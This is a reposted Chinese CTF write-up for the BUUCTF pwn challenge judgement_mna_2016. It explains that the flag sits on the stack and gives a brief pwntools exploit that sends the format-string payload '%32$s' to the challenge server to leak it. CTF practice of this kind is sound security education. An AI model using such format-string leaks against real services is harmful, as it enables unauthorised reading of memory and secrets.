[BUUCTF-pwn]——judgement_mna_2016
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——judgement_mna_2016
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——judgement_mna_2016
還行的一道題, 不過動態調試的時候, 需要你手寫一個flag.txt文件, 不然沒辦法動態調試.
一看就知道這個地方儲存的flag,
如果不確定. 可以去看下start函數的匯編, 執行main函數前就已經將flag寫入了
下面我們只需要計算偏移輸出就好, 記得自己在目錄下面寫個flag.txt文件, 不然沒辦法調試的. 偏移0x1c 或者 0x20都可以
exploit
from pwn import * #p = process('./judgement_mna_2016') p = remote('node3.buuoj.cn',29011) #gdb.attach(p, 'b *0x080487A2') payload = '%32$s' # 28也可以 p.sendlineafter('Input flag >> ',payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——judgement_mna_2016的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——[极客大挑战
- 下一篇: [BUUCTF-pwn]——wustct